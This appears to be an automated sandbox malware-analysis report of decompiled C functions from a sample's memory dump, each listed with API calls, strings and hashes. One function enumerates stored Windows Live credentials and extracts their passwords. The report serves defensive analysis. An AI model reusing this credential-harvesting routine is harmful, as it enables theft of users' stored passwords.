                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 16%
                                                                                                                                                                  			E0040F70E(char* __eax, void* __ecx) {
				void* _t2;
				char* _t3;
				void* _t5;
				void* _t6;
				void* _t7;

				_t3 = __eax;
				_t6 = __ecx;
				_t5 = 4;
				while(1) {
					_t2 =  *_t3;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t5);
					_push("&lt;");
					L14:
					_t2 = memcpy(_t6, ??, ??);
					_t7 = _t7 + 0xc;
					_t6 = _t6 + _t5;
					L16:
					if( *_t3 != 0) {
						_t3 = _t3 + 1;
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if(_t2 != 0xb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t6 = _t2;
										_t6 = _t6 + 1;
									} else {
										_push(_t5);
										_push("<br>");
										goto L14;
									}
								} else {
									_push(5);
									_push("&amp;");
									goto L11;
								}
							} else {
								_push(5);
								_push("&deg;");
								L11:
								_t2 = memcpy(_t6, ??, ??);
								_t7 = _t7 + 0xc;
								_t6 = _t6 + 5;
							}
						} else {
							_t2 = memcpy(_t6, "&quot;", 6);
							_t7 = _t7 + 0xc;
							_t6 = _t6 + 6;
						}
					} else {
						_push(_t5);
						_push("&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                                                                  0x0040f713
                                                                                                                                                                  0x0040f715
                                                                                                                                                                  0x0040f717
                                                                                                                                                                  0x0040f718
                                                                                                                                                                  0x0040f718
                                                                                                                                                                  0x0040f71c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f71e
                                                                                                                                                                  0x0040f71f
                                                                                                                                                                  0x0040f77b
                                                                                                                                                                  0x0040f77c
                                                                                                                                                                  0x0040f781
                                                                                                                                                                  0x0040f784
                                                                                                                                                                  0x0040f78b
                                                                                                                                                                  0x0040f78e
                                                                                                                                                                  0x0040f790
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f790
                                                                                                                                                                  0x0040f796
                                                                                                                                                                  0x0040f726
                                                                                                                                                                  0x0040f728
                                                                                                                                                                  0x0040f734
                                                                                                                                                                  0x0040f74d
                                                                                                                                                                  0x0040f75a
                                                                                                                                                                  0x0040f773
                                                                                                                                                                  0x0040f788
                                                                                                                                                                  0x0040f78a
                                                                                                                                                                  0x0040f775
                                                                                                                                                                  0x0040f775
                                                                                                                                                                  0x0040f776
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f776
                                                                                                                                                                  0x0040f75c
                                                                                                                                                                  0x0040f75c
                                                                                                                                                                  0x0040f75e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f75e
                                                                                                                                                                  0x0040f74f
                                                                                                                                                                  0x0040f74f
                                                                                                                                                                  0x0040f751
                                                                                                                                                                  0x0040f763
                                                                                                                                                                  0x0040f764
                                                                                                                                                                  0x0040f769
                                                                                                                                                                  0x0040f76c
                                                                                                                                                                  0x0040f76c
                                                                                                                                                                  0x0040f736
                                                                                                                                                                  0x0040f73e
                                                                                                                                                                  0x0040f743
                                                                                                                                                                  0x0040f746
                                                                                                                                                                  0x0040f746
                                                                                                                                                                  0x0040f72a
                                                                                                                                                                  0x0040f72a
                                                                                                                                                                  0x0040f72b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f72b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040f728

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                  • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                  • API String ID: 3510742995-3273207271
                                                                                                                                                                  • Opcode ID: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                                                                                                                                                                  • Instruction ID: b4a8218c7fa3979214449631b2efcde822773b41d0541f29ded2a506b887ed0e
                                                                                                                                                                  • Opcode Fuzzy Hash: 91506a718b00cdec2e45e1457c491db783313ed82e55890756c6f05279fb0cf7
                                                                                                                                                                  • Instruction Fuzzy Hash: FF01DFB2EC465025DA7100092C86FE70A494BFAB11FB50137F98533AC4E0AD0CCF829F
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040DEC3, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 69%
                                                                                                                                                                  			E0040DEC3(intOrPtr* _a4) {
				char _v260;
				char _v516;
				void _v771;
				char _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v788;
				int _v796;
				char _v800;
				signed int _v804;
				char _v808;
				char _v812;
				void* __edi;
				void* __esi;
				intOrPtr* _t52;
				void* _t53;
				void* _t57;
				signed int _t58;
				char* _t65;
				unsigned int _t68;
				intOrPtr _t69;
				void* _t85;
				char* _t89;
				intOrPtr _t92;
				intOrPtr* _t93;
				signed int _t94;
				void* _t96;

				_t52 = _a4;
				_t96 = (_t94 & 0xfffffff8) - 0x32c;
				_push(_t85);
				 *((intOrPtr*)(_t52 + 4)) = 0;
				 *((intOrPtr*)(_t52 + 8)) = 0;
				_t89 = 0;
				_t53 = E00406282();
				_t97 =  *((intOrPtr*)(_t53 + 4)) - 5;
				if( *((intOrPtr*)(_t53 + 4)) > 5) {
					_t89 = L"WindowsLive:name=*";
				}
				_v800 = 0;
				_v796 = 0;
				if(E00404651( &_v800, _t85, _t97) == 0) {
					L21:
					return E004046CC( &_v800);
				}
				_v808 = 0;
				_v812 = 0;
				if(_v780 == 0) {
					_t57 = 0;
					__eflags = 0;
				} else {
					_t57 = _v776(_t89, 0,  &_v812,  &_v808);
				}
				if(_t57 == 0) {
					goto L21;
				} else {
					_t58 = 0;
					_v804 = 0;
					if(_v812 <= 0) {
						L20:
						_v788(_v808);
						goto L21;
					} else {
						do {
							_t92 =  *((intOrPtr*)(_v808 + _t58 * 4));
							if( *((intOrPtr*)(_t92 + 4)) == 1 &&  *(_t92 + 8) != 0 &&  *(_t92 + 0x30) != 0) {
								_v772 = 0;
								memset( &_v771, 0, 0xff);
								_t96 = _t96 + 0xc;
								if(WideCharToMultiByte(0, 0,  *(_t92 + 8), 0xffffffff,  &_v772, 0xff, 0, 0) > 0) {
									_push(0x11);
									_t65 =  &_v772;
									_push("windowslive:name=");
									_push(_t65);
									L004120D2();
									_t96 = _t96 + 0xc;
									if(_t65 == 0) {
										_v516 = 0;
										_v260 = 0;
										WideCharToMultiByte(0, 0,  *(_t92 + 0x30), 0xffffffff,  &_v516, 0xff, 0, 0);
										_t68 =  *(_t92 + 0x18);
										if(_t68 > 0) {
											WideCharToMultiByte(0, 0,  *(_t92 + 0x1c), _t68 >> 1,  &_v260, 0xff, 0, 0);
											 *((char*)(_t96 + ( *(_t92 + 0x18) >> 1) + 0x238)) = 0;
										}
										if(_v260 == 0) {
											_t69 = _a4;
											_t44 = _t69 + 8;
											 *_t44 =  *((intOrPtr*)(_t69 + 8)) + 1;
											__eflags =  *_t44;
										} else {
											_t93 = _a4;
											 *((intOrPtr*)( *_t93 + 4))( &_v516);
											 *((intOrPtr*)(_t93 + 4)) =  *((intOrPtr*)(_t93 + 4)) + 1;
										}
									}
								}
							}
							_t58 = _v804 + 1;
							_v804 = _t58;
						} while (_t58 < _v812);
						goto L20;
					}
				}
			}






























                                                                                                                                                                  0x0040dec9
                                                                                                                                                                  0x0040decc
                                                                                                                                                                  0x0040ded6
                                                                                                                                                                  0x0040ded7
                                                                                                                                                                  0x0040deda
                                                                                                                                                                  0x0040dedd
                                                                                                                                                                  0x0040dedf
                                                                                                                                                                  0x0040dee4
                                                                                                                                                                  0x0040dee8
                                                                                                                                                                  0x0040deea
                                                                                                                                                                  0x0040deea
                                                                                                                                                                  0x0040def3
                                                                                                                                                                  0x0040def7
                                                                                                                                                                  0x0040df02
                                                                                                                                                                  0x0040e045
                                                                                                                                                                  0x0040e054
                                                                                                                                                                  0x0040e054
                                                                                                                                                                  0x0040df0c
                                                                                                                                                                  0x0040df10
                                                                                                                                                                  0x0040df14
                                                                                                                                                                  0x0040df28
                                                                                                                                                                  0x0040df28
                                                                                                                                                                  0x0040df16
                                                                                                                                                                  0x0040df22
                                                                                                                                                                  0x0040df22
                                                                                                                                                                  0x0040df2c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040df32
                                                                                                                                                                  0x0040df32
                                                                                                                                                                  0x0040df38
                                                                                                                                                                  0x0040df3c
                                                                                                                                                                  0x0040e03d
                                                                                                                                                                  0x0040e041
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040df42
                                                                                                                                                                  0x0040df47
                                                                                                                                                                  0x0040df4b
                                                                                                                                                                  0x0040df52
                                                                                                                                                                  0x0040df71
                                                                                                                                                                  0x0040df75
                                                                                                                                                                  0x0040df7a
                                                                                                                                                                  0x0040df94
                                                                                                                                                                  0x0040df9a
                                                                                                                                                                  0x0040df9c
                                                                                                                                                                  0x0040dfa0
                                                                                                                                                                  0x0040dfa5
                                                                                                                                                                  0x0040dfa6
                                                                                                                                                                  0x0040dfab
                                                                                                                                                                  0x0040dfb0
                                                                                                                                                                  0x0040dfc2
                                                                                                                                                                  0x0040dfcb
                                                                                                                                                                  0x0040dfd2
                                                                                                                                                                  0x0040dfd8
                                                                                                                                                                  0x0040dfdd
                                                                                                                                                                  0x0040dff2
                                                                                                                                                                  0x0040dffd
                                                                                                                                                                  0x0040dffd
                                                                                                                                                                  0x0040e00b
                                                                                                                                                                  0x0040e024
                                                                                                                                                                  0x0040e027
                                                                                                                                                                  0x0040e027
                                                                                                                                                                  0x0040e027
                                                                                                                                                                  0x0040e00d
                                                                                                                                                                  0x0040e00d
                                                                                                                                                                  0x0040e01c
                                                                                                                                                                  0x0040e01f
                                                                                                                                                                  0x0040e01f
                                                                                                                                                                  0x0040e00b
                                                                                                                                                                  0x0040dfb0
                                                                                                                                                                  0x0040df94
                                                                                                                                                                  0x0040e02e
                                                                                                                                                                  0x0040e033
                                                                                                                                                                  0x0040e033
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040df47
                                                                                                                                                                  0x0040df3c

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00406282: GetVersionExA.KERNEL32(00418118,0000001A,0040F4E8,00000104), ref: 0040629C
                                                                                                                                                                  • memset.MSVCRT ref: 0040DF75
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040DF8C
                                                                                                                                                                  • _strnicmp.MSVCRT ref: 0040DFA6
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFD2
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040DFF2
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                  • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                  • API String ID: 945165440-3589380929
                                                                                                                                                                  • Opcode ID: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                                                                                                                                                                  • Instruction ID: faca0abe0adb4f8b424a3cc142a11908341e250f8e36283e96c9ece6c5c035f0
                                                                                                                                                                  • Opcode Fuzzy Hash: 30eab080ff57603f0c83065378de1aa9d50d3c7817c6219040755b9d083dbe28
                                                                                                                                                                  • Instruction Fuzzy Hash: 14419FB1508345AFC320DF15D8848ABBBECEB84344F00493EF999A2291D734ED48CB66
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00408155, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 78%
                                                                                                                                                                  			E00408155(void* __ecx, void* __eflags, struct HWND__* _a4) {
				void _v259;
				char _v260;
				void _v4359;
				char _v4360;
				int _t17;
				CHAR* _t26;

				E00412360(0x1104, __ecx);
				_v4360 = 0;
				memset( &_v4359, 0, 0x1000);
				_t17 = GetDlgCtrlID(_a4);
				_t35 = _t17;
				GetWindowTextA(_a4,  &_v4360, 0x1000);
				if(_t17 > 0 && _v4360 != 0) {
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					GetClassNameA(_a4,  &_v260, 0xff);
					_t26 =  &_v260;
					_push("sysdatetimepick32");
					_push(_t26);
					L00412072();
					if(_t26 != 0) {
						E0040802D(_t35,  &_v4360);
					}
				}
				return 1;
			}









                                                                                                                                                                  0x0040815d
                                                                                                                                                                  0x00408175
                                                                                                                                                                  0x0040817b
                                                                                                                                                                  0x00408186
                                                                                                                                                                  0x0040818c
                                                                                                                                                                  0x00408199
                                                                                                                                                                  0x004081a1
                                                                                                                                                                  0x004081b9
                                                                                                                                                                  0x004081bf
                                                                                                                                                                  0x004081d2
                                                                                                                                                                  0x004081d8
                                                                                                                                                                  0x004081de
                                                                                                                                                                  0x004081e3
                                                                                                                                                                  0x004081e4
                                                                                                                                                                  0x004081ed
                                                                                                                                                                  0x004081f7
                                                                                                                                                                  0x004081fd
                                                                                                                                                                  0x004081ed
                                                                                                                                                                  0x00408205

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 0040817B
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 00408186
                                                                                                                                                                  • GetWindowTextA.USER32 ref: 00408199
                                                                                                                                                                  • memset.MSVCRT ref: 004081BF
                                                                                                                                                                  • GetClassNameA.USER32(?,?,000000FF), ref: 004081D2
                                                                                                                                                                  • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 004081E4
                                                                                                                                                                    • Part of subcall function 0040802D: _itoa.MSVCRT ref: 0040804E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                                                                                                  • String ID: sysdatetimepick32
                                                                                                                                                                  • API String ID: 896699463-4169760276
                                                                                                                                                                  • Opcode ID: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                                                                                                                                                                  • Instruction ID: 8ec491919e3a594e32bcc0b3aeb202d37a515ee6f0006301200e52d8450d0196
                                                                                                                                                                  • Opcode Fuzzy Hash: a7e83458ae8ab176729b938156b1736a97d8aa9ca8d765e96f30c653e7aaea31
                                                                                                                                                                  • Instruction Fuzzy Hash: 2311EC7280511C7EE7119B54DD41EEB7BACEF19355F0400BBFA44E2152EA789FC48B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040571F, Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                                                  			E0040571F(signed int __ecx, intOrPtr _a4, unsigned int _a8, intOrPtr* _a12) {
				signed int _v8;
				intOrPtr _v16;
				void* __esi;
				void* _t74;
				void* _t75;
				signed int _t76;
				signed int _t89;
				signed int _t90;
				void* _t98;
				void* _t101;
				short* _t118;
				unsigned int _t126;
				intOrPtr _t128;
				signed int _t131;
				void* _t144;
				intOrPtr* _t146;
				short _t153;
				signed int _t155;

				_t129 = __ecx;
				_push(__ecx);
				_t74 = _a4 - 0x4e;
				_t155 = __ecx;
				if(_t74 == 0) {
					_t146 = _a12;
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xfffffffd;
					if( *((intOrPtr*)(_t146 + 8)) == 0xfffffffd) {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if(__eflags == 0) {
							E00404D4C(__eflags,  *_t146,  *(_t146 + 0xc));
						}
					}
					__eflags =  *((intOrPtr*)(_t146 + 8)) - 0xffffff9b;
					if( *((intOrPtr*)(_t146 + 8)) != 0xffffff9b) {
						L27:
						_t75 = 0;
						__eflags = 0;
						goto L28;
					} else {
						__eflags =  *((intOrPtr*)(_t146 + 4)) - 0x3e9;
						if( *((intOrPtr*)(_t146 + 4)) != 0x3e9) {
							goto L27;
						}
						_t76 =  *(_t146 + 0x14);
						__eflags = _t76 & 0x00000002;
						if((_t76 & 0x00000002) == 0) {
							L36:
							_t131 =  *(_t146 + 0x18) ^ _t76;
							__eflags = 0x0000f000 & _t131;
							if((0x0000f000 & _t131) == 0) {
								L39:
								__eflags =  *(_t146 + 0x14) & 0x00000002;
								if(( *(_t146 + 0x14) & 0x00000002) == 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0x18) & 0x00000002;
								if(( *(_t146 + 0x18) & 0x00000002) != 0) {
									goto L27;
								}
								__eflags =  *(_t146 + 0xc);
								E00401413(_t155, 0x3eb, 0 |  *(_t146 + 0xc) != 0x00000000);
								__eflags =  *(_t146 + 0xc) -  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 1;
								E00401413(_t155, 0x3ec, 0 |  *(_t146 + 0xc) !=  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4)) - 0x00000001);
								 *((intOrPtr*)(_t155 + 0x14)) = 1;
								SetDlgItemInt( *(_t155 + 4), 0x3ed,  *( *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) +  *(_t146 + 0x28) * 4), 0);
								 *((intOrPtr*)(_t155 + 0x14)) = 0;
								_t75 = 1;
								L28:
								return _t75;
							}
							L37:
							_t89 = E004048E6( *_t146,  *(_t146 + 0xc), 0xf002);
							__eflags = _t89 & 0x00000002;
							if((_t89 & 0x00000002) != 0) {
								_t90 = _t89 & 0x0000f000;
								__eflags = _t90 - 0x1000;
								_v8 = _t90;
								E00401413(_t155, 0x3ee, 0 | _t90 == 0x00001000);
								_v16 - 0x2000 = _v16 == 0x2000;
								E00401413(_t155, 0x3ef, 0 | _v16 == 0x00002000);
							}
							goto L39;
						}
						__eflags =  *(_t146 + 0x18) & 0x00000002;
						if(( *(_t146 + 0x18) & 0x00000002) == 0) {
							goto L37;
						}
						goto L36;
					}
				}
				_t98 = _t74 - 0xc2;
				if(_t98 == 0) {
					SendDlgItemMessageA( *(__ecx + 4), 0x3ed, 0xc5, 3, 0);
					E004055A9(_t155);
					goto L27;
				}
				_t101 = _t98 - 1;
				if(_t101 != 0) {
					goto L27;
				}
				_t126 = _a8 >> 0x10;
				if( *((intOrPtr*)(__ecx + 0x14)) != _t101 || _t126 != 0x300) {
					L7:
					if(_t126 != 0) {
						goto L27;
					}
					if(_a8 != 0x3f0) {
						L13:
						if(_a8 == 0x3eb) {
							E00404B3F(GetDlgItem( *(_t155 + 4), 0x3e9), _t129);
						}
						if(_a8 == 0x3ec) {
							E00404B82(GetDlgItem( *(_t155 + 4), 0x3e9));
						}
						if(_a8 == 0x3ee) {
							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 1);
						}
						if(_a8 == 0x3ef) {
							E00404BBE(GetDlgItem( *(_t155 + 4), 0x3e9), 0);
						}
						if(_a8 == 2) {
							EndDialog( *(_t155 + 4), 2);
						}
						if(_a8 == 1) {
							E00405542(_t155);
							EndDialog( *(_t155 + 4), 1);
						}
						_t75 = 1;
						goto L28;
					}
					_t128 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)) + 4));
					_t129 = 0;
					if(_t128 <= 0) {
						L12:
						E004055A9(_t155);
						goto L13;
					}
					_t144 = 0;
					do {
						_t118 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0xc)))) + _t129 * 4;
						 *(_t118 + 2) = _t129;
						_t153 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x10)) + _t144 + 0xc));
						_t129 = _t129 + 1;
						_t144 = _t144 + 0x14;
						 *_t118 = _t153;
					} while (_t129 < _t128);
					goto L12;
				} else {
					if(_a8 != 0x3ed) {
						goto L27;
					} else {
						E004054D0(__ecx, __ecx);
						goto L7;
					}
				}
			}





















                                                                                                                                                                  0x0040571f
                                                                                                                                                                  0x00405725
                                                                                                                                                                  0x00405729
                                                                                                                                                                  0x0040572f
                                                                                                                                                                  0x00405731
                                                                                                                                                                  0x00405865
                                                                                                                                                                  0x00405868
                                                                                                                                                                  0x00405871
                                                                                                                                                                  0x00405873
                                                                                                                                                                  0x00405876
                                                                                                                                                                  0x0040587d
                                                                                                                                                                  0x00405883
                                                                                                                                                                  0x00405876
                                                                                                                                                                  0x00405884
                                                                                                                                                                  0x00405888
                                                                                                                                                                  0x0040585a
                                                                                                                                                                  0x0040585a
                                                                                                                                                                  0x0040585a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040588a
                                                                                                                                                                  0x0040588a
                                                                                                                                                                  0x0040588d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040588f
                                                                                                                                                                  0x00405892
                                                                                                                                                                  0x00405899
                                                                                                                                                                  0x004058a1
                                                                                                                                                                  0x004058a4
                                                                                                                                                                  0x004058a6
                                                                                                                                                                  0x004058a8
                                                                                                                                                                  0x004058f7
                                                                                                                                                                  0x004058f7
                                                                                                                                                                  0x004058fb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405901
                                                                                                                                                                  0x00405905
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040590f
                                                                                                                                                                  0x0040591d
                                                                                                                                                                  0x0040592b
                                                                                                                                                                  0x00405939
                                                                                                                                                                  0x00405957
                                                                                                                                                                  0x0040595a
                                                                                                                                                                  0x00405960
                                                                                                                                                                  0x00405963
                                                                                                                                                                  0x0040585c
                                                                                                                                                                  0x00405862
                                                                                                                                                                  0x00405862
                                                                                                                                                                  0x004058aa
                                                                                                                                                                  0x004058b4
                                                                                                                                                                  0x004058bc
                                                                                                                                                                  0x004058be
                                                                                                                                                                  0x004058c0
                                                                                                                                                                  0x004058c4
                                                                                                                                                                  0x004058cc
                                                                                                                                                                  0x004058d8
                                                                                                                                                                  0x004058e7
                                                                                                                                                                  0x004058f2
                                                                                                                                                                  0x004058f2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004058be
                                                                                                                                                                  0x0040589b
                                                                                                                                                                  0x0040589f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040589f
                                                                                                                                                                  0x00405888
                                                                                                                                                                  0x00405737
                                                                                                                                                                  0x0040573c
                                                                                                                                                                  0x0040584e
                                                                                                                                                                  0x00405855
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405855
                                                                                                                                                                  0x00405742
                                                                                                                                                                  0x00405743
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040574c
                                                                                                                                                                  0x00405752
                                                                                                                                                                  0x0040576c
                                                                                                                                                                  0x0040576f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040577b
                                                                                                                                                                  0x004057b0
                                                                                                                                                                  0x004057c1
                                                                                                                                                                  0x004057c9
                                                                                                                                                                  0x004057c9
                                                                                                                                                                  0x004057d4
                                                                                                                                                                  0x004057dc
                                                                                                                                                                  0x004057dc
                                                                                                                                                                  0x004057e7
                                                                                                                                                                  0x004057f2
                                                                                                                                                                  0x004057f8
                                                                                                                                                                  0x004057ff
                                                                                                                                                                  0x0040580a
                                                                                                                                                                  0x00405810
                                                                                                                                                                  0x0040581c
                                                                                                                                                                  0x00405823
                                                                                                                                                                  0x00405823
                                                                                                                                                                  0x0040582a
                                                                                                                                                                  0x0040582c
                                                                                                                                                                  0x00405836
                                                                                                                                                                  0x00405836
                                                                                                                                                                  0x0040583a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040583a
                                                                                                                                                                  0x00405780
                                                                                                                                                                  0x00405783
                                                                                                                                                                  0x00405787
                                                                                                                                                                  0x004057aa
                                                                                                                                                                  0x004057ab
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x004057ab
                                                                                                                                                                  0x00405789
                                                                                                                                                                  0x0040578b
                                                                                                                                                                  0x00405790
                                                                                                                                                                  0x00405793
                                                                                                                                                                  0x0040579a
                                                                                                                                                                  0x0040579f
                                                                                                                                                                  0x004057a0
                                                                                                                                                                  0x004057a5
                                                                                                                                                                  0x004057a5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040575b
                                                                                                                                                                  0x00405761
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405767
                                                                                                                                                                  0x00405767
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00405767
                                                                                                                                                                  0x00405761

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 004057C7
                                                                                                                                                                  • GetDlgItem.USER32 ref: 004057DA
                                                                                                                                                                  • GetDlgItem.USER32 ref: 004057EF
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00405807
                                                                                                                                                                  • EndDialog.USER32(?,00000002), ref: 00405823
                                                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00405836
                                                                                                                                                                    • Part of subcall function 004054D0: GetDlgItem.USER32 ref: 004054DE
                                                                                                                                                                    • Part of subcall function 004054D0: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054F3
                                                                                                                                                                    • Part of subcall function 004054D0: SendMessageA.USER32 ref: 0040550F
                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 0040584E
                                                                                                                                                                  • SetDlgItemInt.USER32 ref: 0040595A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Item$DialogMessageSend
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2485852401-0
                                                                                                                                                                  • Opcode ID: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                                                                                                                                                                  • Instruction ID: 327bdf07108b1d48d13abdf232bd1ccce71b7be96730af3de4981d1ea2c32abc
                                                                                                                                                                  • Opcode Fuzzy Hash: f7827bcec6ef5800e0abba1fd027fbe4bcd8fe50388742f33dd21846a4c000d1
                                                                                                                                                                  • Instruction Fuzzy Hash: 6561C031600A05AFDB25BF25C886A2BB3A5FF40725F00C23EF915A72D1D778A960CF49
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040596A, Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                                  			E0040596A(void** __eax, void* __edi, intOrPtr _a4, struct HWND__* _a8) {
				RECT* _v8;
				void* __esi;
				void* _t39;
				signed int _t41;
				void* _t42;
				struct HWND__* _t47;
				signed int _t53;
				void* _t54;
				signed int _t76;
				signed int _t78;
				void* _t80;
				void** _t82;
				signed int _t86;
				void* _t90;
				signed int _t91;

				_t80 = __edi;
				_push(_t58);
				_push(0xc);
				_v8 = 0;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				L00412090();
				if(__eax == 0) {
					_t82 = 0;
				} else {
					 *((intOrPtr*)(__eax)) = 0;
					_t82 = __eax;
				}
				 *(_t80 + 0xc) = _t82;
				_t39 =  *_t82;
				_t90 = _t39;
				if(_t90 != 0) {
					_push(_t39);
					L00412096();
					 *_t82 = 0;
				}
				_t82[2] = _a8;
				_t41 = E00404A05(_a8);
				_t76 = 4;
				_t82[1] = _t41;
				_t42 = _t41 * _t76;
				_push( ~(0 | _t90 > 0x00000000) | _t42);
				L00412090();
				 *_t82 = _t42;
				memset(_t42, 0, _t82[1] << 2);
				E004085AB( *(_t80 + 0xc), ( *(_t80 + 0xc))[2]);
				_t91 =  *(_t80 + 0x10);
				if(_t91 == 0) {
					_t86 = ( *(_t80 + 0xc))[1];
					_t78 = 0x14;
					_t53 = _t86 * _t78;
					_push( ~(0 | _t91 > 0x00000000) | _t53);
					L00412090();
					 *(_t80 + 0x10) = _t53;
					if(_t86 > 0) {
						_t54 = 0;
						do {
							 *((intOrPtr*)(_t54 +  *(_t80 + 0x10) + 0xc)) = 0x78;
							_t54 = _t54 + 0x14;
							_t86 = _t86 - 1;
